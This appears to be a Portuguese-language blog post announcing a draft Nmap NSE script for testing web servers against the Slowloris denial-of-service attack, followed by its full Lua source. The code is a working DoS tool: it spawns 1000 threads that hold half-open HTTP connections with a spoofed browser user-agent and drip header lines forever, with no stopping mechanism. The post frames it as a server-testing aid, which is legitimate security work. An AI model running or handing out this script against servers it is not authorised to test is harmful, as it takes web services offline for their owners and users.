O desenvolvimento de scripts para o Nmap anda a toda velocidade. Atendendo a pedidos na NSE Wiki o desenvolvedor Ange Gutek disponibilizou o draft; de um script que detecta se o servidor está vulnerável a ataques de DoS usando o Slowloris.

De acordo com Gutek nesse momento o script fará o ataque sem saber se foi bem sucedido ou não, também não gera nenhuma saída e rodará para sempre. O monitoramento é feito através do modo debug (-d).

Sintaxe:

nmap --script http-slowloris --script-args [ARGUMENTOS] [ALVO]

Argumentos:

http-slowloris.threads - Número máximo de conexões concorrentes, se o alvo for Windows esse valor limita-se a 130.

http-slowloris.timeout - Tempo de espera antes de enviar novos dados httpheader. Padrão 100 segundos.

Gutek está convocando contribuidores para ajudar no aprimoramento do script.

Código:

description = [[
Tests a webserver against the Slowloris DoS attack, as it was described at Defcon 17 by RSnake
(see http://ha.ckers.org/slowloris/)

This script opens and maintains numerous 'half-http' connections until the webserver runs out of ressources,
leading to a denial of service.
When the DoS condition is met the script then stops the attack and returns the payload datas as they could be usefull to tweak further filtering rules:
- Time taken until DoS
- Number of threads used
- Number of queries sent (or: amount of datas sent, in bytes)

TODO
o Add a stopping mechanism
+ reserve a thread to monitor the webserver from time to time. If not responding, then stop.
o Analyze the threads: if the number of effective connections is lower than required by the script, maybe notify of a potential filtering rule ahead.
o Add user-supplied arguments:
+ threads, the max number of concurrent connections on the target: on Windows it seems to be limited to 130
+ timeout, time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds, but could be measured as slowloris.pl does

]]

---
-- @usage
-- nmap --script http-slowloris --script-args http-slowloris.threads=500 http-slowloris.timeout=200 <target>
--
-- @args http-slowloris.threads The max number of concurrent connections on the target: on Windows it seems to be limited to 130.
-- @args http-slowloris.timeout Time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds.
--
-- () output
-- 80/tcp open http syn-ack
-- | http-slowloris: Target was DoSed:
-- | the attack took <time> to succeed
-- | with <threads> concurrent connections
-- |_ with <queries||bytes> sent

author = "Ange Gutek"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"dos", "intrusive"}

require "shortport"
require "stdnse"

portrule = shortport.http

action = function(host, port)

math.randomseed(os.time())
local output,i
local threads = {}
nmap.registry.slowloris = {}
nmap.registry.slowloris['threads']=1

-- Threaded function ------------------------------------------------------------------
local doHalfhttp = function(host,port)
local get_uri = math.random(100000, 900000) -- we will query a random page
-- create socket
local slowloris = nmap.new_socket()
local catch = function()
slowloris:close()
end
local try = nmap.new_try(catch)
try(slowloris:connect(host.ip, port))

-- Build a half-http header. Maybe the user-agent string should outline Nmap instead ?
local half_http = "GET /"..get_uri.." HTTP/1.1\r\n"
half_http = half_http.."Host: "..host.ip.."\r\n"
half_http = half_http.."User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
half_http = half_http.."Content-Length: 42\r\n"

try(slowloris:send(half_http))
local count = nmap.registry.slowloris['threads'] -- retrieve the number of already effective connection

count = count + 1
nmap.registry.slowloris['threads']=count
stdnse.print_debug(1, "%s: USING %d THREADS)...", SCRIPT_NAME, nmap.registry.slowloris['threads'])

local queries = 2
while true do
-- this is where we set the time to wait before maintaining the connection by sending a new line to the http header
-- this value would be more efficient if it was just below the target timeout
stdnse.sleep(100)
try(slowloris:send("X-a: b\r\n"))
queries = queries + 1
queries = queries * nmap.registry.slowloris['threads']
stdnse.print_debug(1, "%s: SENT %d QUERIES SO FAR (using %d threads)...", SCRIPT_NAME, queries,nmap.registry.slowloris['threads'])
end

end
-- ------------------------------------------------------------------------------------

-- Main
for i=1,1000 do -- Number of threads to launch
local co = stdnse.new_thread(doHalfhttp, host, port)
threads[co] = true
end
return output

end